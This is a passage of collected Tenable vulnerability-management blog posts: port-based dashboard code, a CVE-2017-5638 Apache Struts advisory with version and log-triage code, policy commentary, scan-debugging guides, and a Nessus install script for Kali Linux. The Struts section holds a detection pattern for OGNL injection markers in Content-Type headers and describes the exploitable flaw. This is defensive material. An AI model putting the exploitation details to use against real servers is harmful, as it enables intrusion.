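    """Dashboard grouping: 0-1024 (well-known) versus everything above."""
    return "0-1024" if port <= 1024 else ">1024"


def counts_by_bucket(findings: Iterable[Finding]) -> Dict[Tuple[str, str], Dict[str, int]]:
    """Port and Protocol view: severity counts per (port bucket, protocol)."""
    table: Dict[Tuple[str, str], Counter] = defaultdict(Counter)
    for f in findings:
        table[(port_bucket(f.port), f.protocol)][severity(f.cvss)] += 1
    return {key: dict(counts) for key, counts in table.items()}


def service_counts(findings: Iterable[Finding]) -> Dict[str, int]:
    """Findings landing on the FTP/SSH/SMTP/HTTP/HTTPS filter ports."""
    out: Counter = Counter()
    for f in findings:
        for name, ports in SERVICE_PORTS.items():
            if f.port in ports:
                out[name] += 1
    return dict(out)


def hosts_by_port(findings: Iterable[Finding], min_severity: str = "medium") -> Dict[int, int]:
    """Counting Hosts by Common Ports view: distinct hosts per port at or above a severity."""
    floor = SEVERITY_ORDER.index(min_severity)
    hosts: Dict[int, set] = defaultdict(set)
    for f in findings:
        if SEVERITY_ORDER.index(severity(f.cvss)) >= floor:
            hosts[f.port].add(f.host)
    return {port: len(h) for port, h in sorted(hosts.items())}


def percent_exploitable(findings: Iterable[Finding]) -> float:
    """Share of findings with a known public exploit, as each component displays it."""
    items = list(findings)
    if not items:
        return 0.0
    return round(100.0 * sum(f.exploitable for f in items) / len(items), 1)


# Constructed sample findings; these are not real scan results.
SAMPLE = [
    Finding("10.0.0.5", 22, "tcp", 5.3, False),
    Finding("10.0.0.5", 80, "tcp", 7.5, True),
    Finding("10.0.0.6", 80, "tcp", 9.8, True),
    Finding("10.0.0.6", 443, "tcp", 2.1, False),
    Finding("10.0.0.7", 21, "tcp", 9.1, True),
    Finding("10.0.0.7", 161, "udp", 4.3, False),
    Finding("10.0.0.8", 8080, "tcp", 6.5, False),
    Finding("10.0.0.8", 3389, "tcp", 9.0, True),
]

if __name__ == "__main__":
    for key, row in counts_by_bucket(SAMPLE).items():
        print(key, row)
    print("services:", service_counts(SAMPLE))
    print("hosts per port (medium+):", hosts_by_port(SAMPLE))
    print("exploitable %:", percent_exploitable(SAMPLE))
```

The severity floor in `hosts_by_port` mirrors the dashboard's practice of leaving informational results out of host counts; lower it to `"low"` if you want every finding counted.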

Wrapping up

As you work to address your risk mitigation tasks and track progress, the Tenable.io Vulnerabilities by Common Ports dashboard provides key analytics. Use the dashboard to greatly reduce the time and effort to review and mitigate risks associated with common ports. Whether you are communicating up the chain, to peers, or to your team, this dashboard provides a thorough look at your outstanding risk with ports and services.

Interested in learning more about Tenable.io?

Securing Today's Elastic Attack Surface


Good cyber hygiene starts with visibility into all assets on your network. But with today’s infrastructures expanding into the cloud, web apps, virtual machines, DevOps containers, IoT and mobile devices, the network perimeter is disappearing and a comprehensive inventory is challenging to achieve.

This "elastic attack surface" is expanding rapidly, creating security gaps and business risks.

In a recent article on Dark Reading titled Securing Today's 'Elastic Attack Surface' Amit Yoran shares his thoughts on modernizing the vulnerability management program and securing the elastic IT environment.

Read the full article

Managing the New Elastic Attack Surface

Apache Struts Jakarta Remote Code Execution (CVE-2017-5638) Detection with Nessus


A remote code execution vulnerability (CVE-2017-5638) in the Jakarta Multipart Parser in certain versions of the Apache Struts framework can enable a remote attacker to run arbitrary commands on the web server. Since its initial disclosure, this vulnerability has received significant attention, and is reportedly exploited in the wild. Public exploits are also available for this vulnerability. Customers are advised to immediately patch their servers to the latest versions of Apache Struts or implement recommended workarounds.

Vulnerability details

A remote code execution vulnerability exists due to a weakness in the way that the Jakarta Multipart Parser component of Apache Struts processes Content-Type headers during a file upload. By exploiting this flaw, a remote attacker could execute arbitrary commands on the remote host subject to the privileges of the user running the web server. Authentication is not required to exploit this flaw.

Tenable coverage

Tenable has released two plugins to detect this flaw in your network. Plugin 97610 is a remote plugin and will attempt to exploit the flaw against target URLs that are discovered by webmirror. A successful scan of a target will produce the following results:

Plugin 97610 results

If you suspect your system is vulnerable but it is not reporting something similar, check the scan’s Audit Trail for plugin 97610. Nessus may have difficulty crawling some web applications, and you may need to adjust policy settings to add a specific URL. This can be done under Assessment > Web Applications > Web Crawler > Start crawling from in the policy:

Crawling a specific URL

In addition to our remote check, a local version check is available for Windows targets (plugin 97576). Note that this plugin only runs in scans where the Accuracy setting is set to Show potential false alarms.

What customers should do

Customers who are affected by this vulnerability should upgrade to Apache Struts version 2.3.32 or 2.5.10.1. A workaround is available for Apache Struts version 2.5.8 - 2.5.10.1. This workaround is documented at https://cwiki.apache.org/confluence/display/WW/S2-045.

Due to the nature of this vulnerability, it is critical that vulnerable hosts are patched as quickly as possible. By leveraging the remote check available from Nessus, it is possible to scan all of your web applications to identify any application that is using an outdated version of Struts.
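Two defender-side checks that follow from the description above, as an added example that is not Tenable's plugin code: a version check against the fixed releases the post names (2.3.32 and 2.5.10.1), and a log triage pass that flags POST requests whose Content-Type header is not a syntactically valid media type or contains an OGNL expression delimiter (`%{` or `${`), which is where this flaw is triggered. The access-log format, the sample lines and the marker string in them are constructed for this example; the media-type grammar is the RFC 7230 token/type syntax.

```python
"""Added example: version triage and Content-Type log triage for CVE-2017-5638."""
import re
from typing import Dict, List, Optional, Tuple

# Fixed releases named in the post, keyed by release branch.
FIXED = {(2, 3): (2, 3, 32), (2, 5): (2, 5, 10, 1)}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.5.10.1' into (2, 5, 10, 1) so tuples compare numerically."""
    return tuple(int(part) for part in text.strip().split("."))


def struts_needs_upgrade(version: str) -> bool:
    """True when the version sits on the 2.3 or 2.5 branch below its fixed release."""
    v = parse_version(version)
    fixed = FIXED.get(v[:2])
    return fixed is not None and v < fixed


# RFC 7230 token characters; a media type is token "/" token, then optional parameters.
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
MEDIA_TYPE_RE = re.compile(rf"^{_TOKEN}/{_TOKEN}\s*(;.*)?$")
OGNL_DELIMITERS = ("%{", "${")


def content_type_reason(value: Optional[str]) -> Optional[str]:
    """Explain why a Content-Type value is suspicious, or return None if it looks normal."""
    if not value or value == "-":          # header absent in the log
        return None
    if any(d in value for d in OGNL_DELIMITERS):
        return "ognl-delimiter"
    if not MEDIA_TYPE_RE.match(value.strip()):
        return "malformed-media-type"
    return None


# Constructed log layout for this example: ts client method path status "content-type"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def flag_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per request whose Content-Type deserves an analyst's look."""
    flagged = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue                        # skip lines that do not fit the layout
        ts, client, method, path, status, ctype = match.groups()
        reason = content_type_reason(ctype)
        if reason:
            flagged.append({"ts": ts, "client": client, "method": method,
                            "path": path, "status": status, "reason": reason})
    return flagged


# Constructed sample lines; the bracketed marker is a placeholder, not a payload.
SAMPLE_LOG = [
    '2017-03-08T10:01:02Z 10.0.0.5 POST /upload.action 200 "multipart/form-data; boundary=----ExampleBoundary"',
    '2017-03-08T10:01:09Z 10.0.0.9 POST /upload.action 200 "%{CONSTRUCTED_OGNL_MARKER}"',
    '2017-03-08T10:01:15Z 10.0.0.7 GET /index.action 200 "-"',
    '2017-03-08T10:01:21Z 10.0.0.8 POST /upload.action 400 "not a media type"',
]

if __name__ == "__main__":
    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(ver, "needs upgrade" if struts_needs_upgrade(ver) else "fixed")
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

The version check is only as good as the version you feed it; on a real host take it from the deployed `struts2-core` jar rather than from a build manifest. The log check is a triage aid, not a replacement for the remote plugin: it only sees requests that were logged with their Content-Type header.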

Thanks to William Spires for his contributions to this blog.

National Cybersecurity Policy Adjustments


Securing the government’s information systems is one of the most important tasks facing the new administration. It is a challenge that agencies have struggled with for over 20 years, and with the increasing complexity of federal networks, it is becoming more difficult. Like their private industry colleagues, agencies are turning to cloud and IoT technologies to increase access and efficiencies. In doing so, they must address the exposure of their entire attack surface, including legacy platforms and these new technologies.

Early White House appointments and a pending executive order demonstrate a focus on accountability and regaining control of government networks.

It takes more than money

The government’s primary weapon in the fight to secure its networks has been money. The recently released budget blueprint includes a proposed $1.5 billion for the Department of Homeland Security to protect Federal networks and critical infrastructure from attack.

Throwing money at the problem will not solve it

My experience in and observation of cybersecurity efforts has shown that throwing money at the problem will not solve it. It is more important to make cybersecurity a cultural priority first and foremost. Organizations in government or industry which embrace the inherent importance of cybersecurity and exercise good systems and cyber hygiene are orders of magnitude more secure than those that spend more and prioritize less. Organizations and agencies need to understand their exposure and address the problems that have been there for years. Traditional cybersecurity focus on the network perimeter is no longer adequate. Technologies like cloud, IoT and DevOps processes introduce vectors that bypass the perimeter on the way into agencies’ systems and data. If you haven’t picked up on the irony of it, most of the high profile breaches are the result of adversaries exploiting well-known vulnerabilities and exfiltrating sensitive data.

Most high profile breaches are the result of adversaries exploiting well-known vulnerabilities

If network administrators and security professionals do not know their networks, they cannot possibly defend them. Knowing your network means knowing the architectures, systems, protocols, applications, users, data types, and the business and mission processes they support. This simple prerequisite for success gets incredibly challenging when you think about the proliferation of non-traditional compute platforms and processes across the enterprise.

The President is expected to appoint the National Security Agency’s Rob Joyce to handle government cybersecurity policy. Joyce, who heads NSA’s Tailored Access Operations hacking group, would work under homeland security advisor Tom Bossert, a former national security aide to President George W. Bush.

Joyce, with his hands-on experience in penetrating the networks of adversary nations, brings a great perspective to U.S. cybersecurity. At last year’s 2016 USENIX conference, he explained that there is no magic bullet for attacking or defending a network. The key to successfully attacking a network is “to know it better than the people who designed it and the people who are securing it.” Conversely, the key to defense is to know your own network better than your adversaries.

The key to defense is to know your own network better than your adversaries

Applying this message to U.S. cybersecurity means complete discovery and mapping of networks, identifying all systems and devices and assessing their configuration and security status. The National Institute of Standards and Technology has produced a library of cybersecurity standards and best practices, but this guidance cannot be used until agencies are aware of their networks and can monitor their systems.

Having a cybersecurity advisor in the White House who understands and lives by this will help ensure that agencies properly prioritize their cybersecurity efforts. The final version of the president’s executive order on cybersecurity has not yet been released, but I am encouraged that draft versions would hold agency heads accountable for their cybersecurity. Accountability is a powerful tool for focusing attention on the basics and to deny intruders the opportunity to burrow into our systems. Those of us who work in the commercial sector must also refrain from resting on our laurels. Staying ahead of our adversaries is a shared responsibility for all of us.

Cybersecurity is a non-partisan issue, and I have confidence that Bossert and Joyce will help bring a new focus to U.S. cybersecurity, and will work constructively with the private sector and government leaders to bring the best intelligence, process and technology to bear on the task of defending our networks.

Continuity and change

The new administration does not have to start from scratch to form its cybersecurity policy. Cybersecurity has been a priority of previous administrations, and despite shortcomings, there have been important contributions that the president and his advisors can build on, including the NIST Cybersecurity Framework, the DHS Continuous Diagnostics and Mitigation (CDM) program, and the proposed IT Modernization Fund.

Change happens when cybersecurity is elevated to the highest priority in an organization

By building on what works and focusing on the basics of improving the security of our networks, we now have a chance to move government cybersecurity into a new era. Change happens when cybersecurity is elevated to the highest priority in an organization, including government. We must all protect the modern IT landscape, make smart investments in people and technology, improve cooperation, and embrace accountability to succeed.


Integrate Everywhere with Tenable.io


Successful vulnerability management (VM) programs aren’t isolated programs. Successful ones include active participants from multiple teams who can share data and results with each other, so that everyone benefits from greater visibility, automation and control. And while in the past VM providers haven’t made their products easy to integrate with, that changes with Tenable.io™. We designed Tenable.io to be the most open VM solution, with multiple ways to integrate it with other products and/or into your workflows and business processes.

Pre-built integrations

With Tenable.io, there’s a strong set of pre-built integrations with complementary systems

With Tenable.io, there’s a strong set of pre-built integrations with complementary systems. For example, there are integrations with credential management systems which make it easier for you to access credentials when doing authenticated scans. There are integrations with patch management systems to make it easy to compare vulnerability results. And integrations with mobile device management systems give access to mobile data that would otherwise be very difficult to access. You can learn more about these and other integrations at our Tenable.io integrations page.

Robust and well-documented API

All the capabilities of Tenable.io Vulnerability Management are available in the API

Even if you’re not currently a customer, you can still take a look at the Tenable.io API today. It’s publicly available and, as you’ll see, is fully documented, simple and testable directly in the browser. All the capabilities of Tenable.io Vulnerability Management – accurate asset tracking, vulnerability states, workbenches and reports, etc. – are available in the API so that customers and partners can use any data they need in an automated fashion.

Tenable.io API

Easy-to-use Software Development Kit (SDK)

A dedicated SDK takes a task-oriented approach to using the Tenable.io API

Since not everybody is a programmer, but might still wish to access Tenable.io capabilities and data programmatically, we also created a dedicated SDK, which takes a task-oriented approach to using the Tenable.io API. For example, if you want to run a scan, the scan.launch() function wraps up a variety of API calls into one single line of code.

The current Python SDK is available on GitHub. Additional language support will be available in the future and we’ll continue to enhance the SDK as Tenable.io gains more capabilities. Both customers and partners who want to integrate with Tenable.io, but who lack developer resources to do so, will find the SDK invaluable.

Tenable.io SDK for Python

Wrapping up

Integrations make your vulnerability management program more successful, by enabling you to make full use of existing technology investments and by helping to automate manual tasks, so you can focus on the most critical issues. With multiple options available, Tenable.io is easy to integrate into your environment in whatever way makes best sense for your organization.

Integrations make your vulnerability management program more successful

Interested in learning more?

Prioritize Hosts Dashboard

Tenable.io Vulnerability Management

What systems on your network need attention now? With all the administrative work you need to have done by yesterday, how do you prioritize mitigation efforts to deal with host vulnerabilities? The enhanced vulnerability detection capabilities of Tenable.io™ can help you make the best prioritization decisions for keeping your network secure. The Prioritize Hosts dashboard presents several lists of hosts requiring immediate attention, such as top hosts infected with malware and top hosts with exploitable vulnerabilities, to help you decide which hosts should be prioritized first.

Prioritize Hosts dashboard

Top priority assets to secure

The Top Hosts Infected with Malware table displays the top hosts on the network that have detected malware infections. The plugin family Backdoors is used to detect malware on the hosts. A count of malware detections and a bar graph indicating the severity of the malware are given for each host. The hosts presented in this table are probably already compromised, making them the highest priority to deal with before an infection can spread.

To learn more about these malware infections, go to the Vulnerabilities Workbench and set an Advanced filter of Plugin Family equal to Backdoors:

Vulnerabilities Workbench


Advanced search filter for backdoors

Once the filter is applied, clicking on individual vulnerabilities in the table at the bottom of the Workbench will bring up the malware infection vulnerability details. These details include the vulnerability description and the assets the vulnerability was detected on, and may also include information such as plugin output, last seen time, and solution information.

The Top Hosts with Exploitable Vulnerabilities table displays the top hosts on the network that have vulnerabilities that are known to be exploitable. Well-known exploits such as Shellshock are added to exploit frameworks like Metasploit or Core Impact to allow pen testers to exploit vulnerable systems. Unfortunately, malicious adversaries also use these frameworks to attack companies. This table shows systems that are vulnerable to these frameworks and other malware known to exist in the wild. I find these vulnerabilities particularly concerning because any script kiddie can easily knock over any of your machines that have one of these vulnerabilities. I recommend making these hosts a high priority to lock down—especially if they are internet-facing!

To learn more about these exploitable vulnerabilities, go again to the Vulnerabilities Workbench and this time set the Advanced filter of Exploit Available equal to true:

Advanced search filter for exploitable vulnerabilities

As before, clicking on an individual vulnerability will bring up the details:

Vulnerabilities details

These details provide lots of useful information, including the vulnerability description and the assets the vulnerability was detected on. Also included may be plugin output, when the vulnerability was first seen, reference information, and links to go to for more information. Most importantly, solutions to the vulnerabilities are given. In almost all cases, the solution to these exploitable vulnerabilities is to patch your applications and operating systems, and upgrade older versions of software.

Prioritizing assets using vulnerability plugin families

The Top Hosts Running Vulnerable Web Servers table displays the top hosts with web server vulnerabilities and vulnerabilities in web technologies such as PHP and OpenSSL. These vulnerabilities are troublesome because they may allow an attacker to access data that should not be publicly accessible. Leakage of this data can lead to loss of sensitive information and may even put people at risk of identity theft. You will likely discover that you have more web servers on your network than you thought you did, which is a security risk as well! Make sure all detected web servers are authorized, and that they are properly secured.

For details on these web server vulnerabilities, go to the Vulnerabilities Workbench and set the Advanced filter of Plugin Family equal to Web Servers. In addition, to only display those vulnerabilities that are of most concern, set a filter of Severity not equal to None:

Advanced search filter for web servers with priority

Both the Top Hosts Infected with Malware table and the Top Hosts Running Vulnerable Web Servers table make use of filters on Plugin Family. You can use other plugin family filters to detect other types of vulnerabilities on assets. For example, you may want to know how vulnerable your databases are: you can use the Databases plugin family. Other plugin family suggestions are Firewalls, SCADA, Cisco, and local security checks for various operating systems. Use the plugin families that are appropriate in your environment to help you prioritize assets to secure, and check the vulnerability details for guidance on how to secure the assets.

Prioritizing assets using vulnerability keywords

The final table on the dashboard, Top Hosts with Java Vulnerabilities, uses a keyword filter for “java” in the Plugin Name to display the top hosts with Java vulnerabilities. These vulnerabilities include outdated versions of Java and the Java Development Kit (JDK), and vulnerabilities in applications that use Java. Because of the filter, concerns with JavaScript will also be included. Since Java is so commonly used on all kinds of devices, Java vulnerabilities can potentially open up huge security holes. These vulnerabilities must be dealt with as soon as possible.

For details on these vulnerabilities, go to the Vulnerabilities Workbench and set the Advanced filter of Plugin Name to contains java (the filter is not case sensitive):

Advanced search filter for Java plugins with priority

You can use other Plugin Name keywords to detect other types of vulnerabilities. For example, use “adobe” to find vulnerabilities in Adobe products, “unsupported” to find products that are no longer supported, “default”, “malicious process”, and “xss”. These and other plugin name keywords may be appropriate in your environment and can help you prioritize assets to secure. Experiment a bit! There are many possible filters; find the ones that best help your organization discover vulnerabilities that are the highest priority to fix.

Flexible licensing

The Tenable.io Vulnerability Management platform accurately captures vulnerabilities on transient and dynamic assets. Because asset data can change constantly, Tenable’s new Elastic Asset Licensing model employs an advanced algorithm to track changing asset attributes across the network over time. This asset-based model helps you recover licenses for temporary systems and isolated assets that are scanned periodically.

Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks, and helps track improvements over time. Try Tenable.io Vulnerability Management free for 60 days.

Quick Credential Debug Scan


What scans do you use? Tenable customers can assess their security risks from information gathered by vulnerability and compliance scans. In this blog, I’ll show you how to build a customized scan that helps diagnose authentication issues that show up when running those scans. I call it the Quick Credential Debug Scan, or QCD for short.

QCD is popular because of its speed and its light impact on the target. QCD performs key tests required to access the target system. Even though the scan requires credentials, the scan does not probe for vulnerability or compliance information.

The Host Access Capabilities component in the Credentialed Windows Scanning dashboard shows some of the diagnostic results tested by QCD:

Host Access Capabilities component

The QCD scan is built with tests recommended by Tenable customers and other sources. QCD works with Tenable scanning products: from Tenable.io™ and SecurityCenter® to Nessus® Manager and Professional. The scan contains a customized policy which includes specific tests or “plugins” (referenced by plugin id number in the Building the Scan section below). Note that “scan” and “scan policy” are used synonymously in this blog.

History of the QCD scan policy

When I first started working with Nessus and SecurityCenter, I scanned using vulnerability and compliance scans. Often, when scanning systems for the first time, I had authentication issues. I would make changes and then rerun the vulnerability scan. I did not like the load and the duration of the vulnerability scans; I realized I needed a debug scan, but did not have the time to figure out which plugins to include.

After joining Tenable, I worked with some savvy customers who had built a useful debug scan. I incorporated their selections with a few others in composing the QCD scan policy. QCD helps validate access to Windows and Linux targets. The QCD includes a short list of plugins so the scan runs quickly and with little impact on the target system.

To fix those scan access issues, QCD helps debug in two places: first, with scan credentials; second, with system access settings. Typically I may run QCD many times as I experiment with different settings until the scan runs cleanly.

For example, when my scan returns plugin Authentication Failure - Local Checks Not Run (21745), I log into the target system’s service account manually. Once I have determined the correct login manually, I update the scan credentials. Then I run QCD to verify that the problem has been solved.

Another example is when I see the Microsoft Windows SMB Registry Not Fully Accessible Detection (10428) plugin, my next step is to turn on the registry service scan option. Then I run QCD to verify that the change solves the problem. Sometimes this process may take several iterations before all the systems are scanning without any issues.

Building the scan

The custom QCD (Advanced) scan policy can be built by selecting a few individual plugins. The QCD scan pulls plugins from three families: General, Settings, and Windows.

These plugins provide the following functions:

  • Login checks: 10394, 12634, 21745
  • Access checks: 10400, 24269
  • Software summary: 20811, 22869
  • OS identification: 11936
  • Other info: 10150, 10396, 10400, 10919, 12053, 19506, 64582

The QCD scan policy includes the following plugins (plugin id numbers are in parentheses):

  • Windows family
    • (10150) Windows NetBIOS / SMB Remote Host Information Disclosure
    • (10394) Microsoft Windows SMB Log In Possible
    • (10396) Microsoft Windows SMB Shares Access
    • (10400) Microsoft Windows SMB Registry Remotely Accessible
    • (20811) Microsoft Windows Installed Software Enumeration (credentialed check)
    • (24269) Windows Management Instrumentation (WMI) Available
  • General family
    • (10919) Open Port Re-check
    • (12053) Host Fully Qualified Domain Name (FQDN) Resolution
    • (22869) Software Enumeration (SSH)
    • (11936) OS Identification
    • (64582) Netstat Connection Information
  • Settings family
    • (12634) Authenticated Check: OS Name and Installed Package Enumeration
    • (19506) Nessus Scan Information
    • (21745) Authentication Failure - Local Checks Not Run

The following SecurityCenter screenshots illustrate how to create the QCD. SecurityCenter provides a handy search filter which helps locate the plugins.

General list

Settings list

Windows list

You can build this scan policy yourself or download the XML file available on the Tenable Community.

Other plugins can be included. Let us know what plugins you have found useful for debugging scan access on community.tenable.com.

Seeing the results

Two dashboard templates are helpful in looking at scan issues and the results from the QCD scans. The Credentialed Windows Scanning and Credentialed Linux Scanning dashboards display many of these plugin results. Remember to refresh the element after running the scan.

The Host Access Capabilities component in the bottom left of the Credentialed Windows Scanning dashboard lays out six of the most common access issues in the Windows environment. The Linux dashboard has similar checks.

Credentialed Windows Scanning Dashboard

Summary

Try the Quick Credential Debug scan to rapidly solve your scan access issues while reducing impact on the target systems. And share your observations with us at the Tenable Community!

2017 Trends in Vulnerability Management, Featuring Forrester Research


Earlier this week, guest speaker Josh Zelonis, Senior Analyst at Forrester, and Michael Applebaum, VP Product Marketing at Tenable, spoke at a webinar about some of the big trends in vulnerability management in 2017.

You can access an on-demand recording anytime on our Webinars web page. If you’re wondering what it was all about, here are a few highlights.

Forrester survey results

49% of organizations suffered one or more breaches in the past year

Josh kicked off the talk by sharing a few results from a recent Forrester Global Security Survey. I was surprised by the first result he shared -- that 49% of organizations had suffered one or more breaches in the past year. I know the breaches are common; any Google search for “data breach” will come up with pages of results. A search today, for example, shows that job seekers are one group who had a bad week with breaches reported at the Illinois Department of Employment Security, IdahoWorks, and America's JobLink Alliance (AJLA) affecting millions of job applicants in multiple states. Still, I was surprised that the survey result showed breaches affected almost half of all organizations.

The #1 issue that was pervasive across the attacks was software vulnerabilities or software exploits

Given all the focus and research we do on vulnerability management here at Tenable, less surprising was the detail of how those breaches occurred. Of the 49% of organizations that reported being breached, 56% had experienced one of those breaches as an external attack, and the #1 issue that was pervasive across the attacks was software vulnerabilities or software exploits. We know that vulnerability management is a significant challenge for organizations in 2017.

The mix of active scanners, agents and passive listening sensors in Tenable.io is designed to maximize scan coverage

One reason Josh gave for vulnerability management being such a challenge is that organizations have a difficult time knowing what assets are in their environment, especially fluid or dynamic assets that come and go from the network frequently, like cloud services or containers. Tenable research shows that dynamic assets are difficult to track using traditional vulnerability management methods like active scanning alone. If a cloud service or container isn’t on the network when an active scan is taking place, it won’t be included in the results. That’s one reason why Tenable has invested so much in Tenable.io and specifically the Tenable.io Container Security application. The mix of active scanners, agents and passive listening sensors in Tenable.io is designed to maximize scan coverage, while the specific capabilities of Tenable.io Container Security bring security into the container build process.

DevOps and early detection

These dynamic assets though, as Josh put it, can actually be a gift to security. Dynamic assets like containers are often discussed in the context of DevOps. DevOps, as you likely know, is the cooperation between developers and operations professionals (and often QA and security) with a goal to accelerate IT and development processes. DevOps gives organizations the ability to set goals, determine processes, and test for security misconfigurations and vulnerabilities earlier in the development lifecycle. Software flaws can be identified and addressed in the QA environment, which is not only more secure, but also more efficient than fixing flaws in production applications.

Learn more

There are more good insights from Josh and others in the webinar. I encourage you to take a few minutes to enjoy the webinar and also learn more about Tenable.io via any of these resources:

Getting Started with Nessus on Kali Linux


Kali Linux, a Linux distribution designed specifically for penetration testing, comes prepackaged with many pen test tools. Nessus® provides a penetration tester with a wealth of capabilities that will assist in the engagement, such as:

  • Identifying local and remote vulnerabilities
  • Configuration and compliance audits
  • Checking for default credentials
  • Web application scanning

Because the Kali Linux installation of Nessus has been very popular over the past several years, we decided to update the instructions to help you make the most of your pen testing environment.

Nessus isn’t installed on Kali Linux by default, but this post will show you how to install Nessus and provide some suggestions for using it in a penetration testing engagement to gain a more complete understanding of your organization's security posture.

Installing and configuring Nessus

Prior to downloading Nessus, ensure that your Kali Linux installation is up to date:

apt update && apt upgrade

Step 1: Purchase Nessus and obtain an Activation Code

Nessus can be purchased directly from Tenable or through an authorized reseller.

After purchasing Nessus, an Activation Code will be available on the Tenable Support Portal.

Step 2: Download Nessus

Navigate to the Tenable Nessus downloads page and select the appropriate version for your installation of Kali Linux, either the 32-bit or 64-bit Debian package:

Nessus-6.10.4-debian6_i386.deb Nessus 6.10.4 for Debian 6, 7, 8 / Kali Linux 1, 2016 Rolling - i386
Nessus-6.10.4-debian6_amd64.deb Nessus 6.10.4 for Debian 6, 7, 8 / Kali Linux 1, 2016 Rolling - AMD64

Step 3: Install Nessus

Using the command line, install the package you downloaded. The filename must match the version and architecture you selected in Step 2; the 64-bit package is shown here:

dpkg -i Nessus-6.10.4-debian6_amd64.deb

Once the installation completes, start the Nessus service:

/etc/init.d/nessusd start

If you would like Nessus to start when Kali Linux boots, issue the command:

update-rc.d nessusd enable

[Screenshot: Installing Nessus]

After the Nessus service starts, use a web browser to navigate to the Nessus Web Interface at https://localhost:8834/.

Step 4: Configure and use Nessus

You will see a browser warning about the SSL certificate, because Nessus ships with a self-signed certificate. You can continue past this warning for a local installation, or consult the Nessus User Guide to install a certificate issued by your own CA.

To configure Nessus, follow the installation wizard. Create an administrator user account, activate with your activation code from the Tenable Support Portal, and let Nessus fetch and process the plugins.

Refer to the official Nessus documentation for any other questions or issues with installing Nessus.
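The four steps above as one script, added here as an example; it is not taken from the Tenable post or from Tenable's own tooling. It assumes the .deb from Step 2 is already in the working directory, that NESSUS_VERSION matches the file you downloaded (6.10.4 as in the post), and that NESSUS_SHA256, if you set it, is the checksum Tenable publishes next to the download. Deriving the package name from the machine's architecture avoids the easy mistake of installing a different file than the one you downloaded.

```shell
#!/bin/sh
# Added example, not from the Tenable post. Installs a previously downloaded
# Nessus .deb on Kali Linux following the steps in the post.
# Assumptions: NESSUS_VERSION matches the downloaded file (default 6.10.4);
# NESSUS_SHA256 (optional) is the checksum from the Tenable downloads page.
set -eu

NESSUS_VERSION="${NESSUS_VERSION:-6.10.4}"

# Map dpkg's architecture name to the suffix Tenable uses in its package names.
# The post lists i386 and amd64 packages only, so anything else is an error.
nessus_pkg_for_arch() {
    case "$1" in
        amd64) echo "Nessus-${NESSUS_VERSION}-debian6_amd64.deb" ;;
        i386)  echo "Nessus-${NESSUS_VERSION}-debian6_i386.deb" ;;
        *)     echo "unsupported architecture: $1" >&2; return 1 ;;
    esac
}

# Check the package against the published SHA-256. With NESSUS_SHA256 unset the
# check is skipped loudly rather than passing silently.
verify_pkg() {
    if [ -z "${NESSUS_SHA256:-}" ]; then
        echo "WARNING: NESSUS_SHA256 not set; package integrity not verified" >&2
        return 0
    fi
    echo "${NESSUS_SHA256}  $1" | sha256sum -c -
}

# Steps 3 and 4 of the post: install, start, enable at boot, then wait for the
# web interface on port 8834 before reporting success.
install_nessus() {
    pkg="$(nessus_pkg_for_arch "$(dpkg --print-architecture)")"
    [ -f "$pkg" ] || { echo "missing $pkg in $(pwd)" >&2; return 1; }
    verify_pkg "$pkg"
    apt update && apt upgrade -y
    dpkg -i "$pkg"
    /etc/init.d/nessusd start
    update-rc.d nessusd enable
    for _ in $(seq 1 30); do
        if ss -ltn | grep -q ':8834 '; then
            echo "Nessus is up: https://localhost:8834/"
            return 0
        fi
        sleep 2
    done
    echo "nessusd did not open port 8834" >&2
    return 1
}

# Usage (as root, in the directory holding the .deb):
#   . ./install-nessus.sh && install_nessus
```

The init.d and update-rc.d calls are the ones the post uses; on a systemd-based Kali release the equivalents are `systemctl start nessusd` and `systemctl enable nessusd`.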

[Screenshot: Nessus interface]

Using Nessus in a penetration test

Kali Linux tools complement your Nessus installation, with everything in one place for easy maintenance. Nessus reports on host discovery, vulnerability detection and exploitability. Here are some of the ways that Nessus can be used to support penetration testing:

Conclusion

Nessus is the world’s most widely-deployed vulnerability assessment solution. Nessus quickly and accurately identifies vulnerabilities, configuration issues and malware in physical, virtual and cloud environments to help you prioritize what to fix first. Combine Nessus with Kali Linux to build a superior pen testing toolkit that provides deep insight into your network systems.

For more information

To download Nessus, visit the Nessus Download page or evaluate Nessus Professional for 7 days.

Web Services Indicator Dashboard

The same services we use to connect our networks to the vast resources of the internet can be used against us if not properly secured. Many of the most effective exploits leverage vulnerabilities in common web services, making our jobs more difficult because connectivity is synonymous with exposure. Finding the balance between easy access to resources and securing the network against exploitation is a major challenge that every organization faces, but one that Tenable can help overcome. With the Web Services Indicator dashboard in Tenable.io™, the information you need to earn leadership support to strengthen network defenses against web service exploitation is at your fingertips.

[Screenshot: Web Services Indicator dashboard]

Locating the links

The Malicious URL matrix in the Web Services Indicator dashboard counts detections of HTTP and HTTPS pages that link to malicious content. The matrix leverages the Web Site Links to Malicious Content Nessus plugin (ID 52670) to detect website URLs that link to malicious sources. Since malware is so often distributed via web traffic, you should look into the causes of these detections promptly.

The easiest way to learn more about the hosts with links to malicious content is to apply an Advanced Filter to the Vulnerabilities workbench. Using a filter for plugin ID 52670 will present a list of all hosts on which the plugin detected malicious links:

[Screenshot: Vulnerabilities workbench with an Advanced filter for plugin ID]

You can find lots of useful details on the drill-down page for a specific result. This includes the plugin description as well as the assets the activity was detected on. Plugin output, when the result was first seen, reference information, and links to more information may also be included. Often most importantly, solutions for remediating detected vulnerabilities are given.

The cells in the External URL Indicator matrix turn purple when a URL using the specified scheme is discovered during a scan. The matrix uses the External URLs active plugin (ID 49704) to identify more than 150 URI schemes in links found on hosts. Common schemes include http, ftp and about. The scheme is the first section of a URL, terminated by a colon and, for most network schemes, followed by two slashes. If you notice results for unexpected schemes, investigate the source to ensure that only reliable and authorized external URLs are being referenced. Often these results are just links to a company's additional resources in its support documentation. However, malware regularly contains URLs that it calls back to or connects to, so keeping an eye on these results is the safest bet.
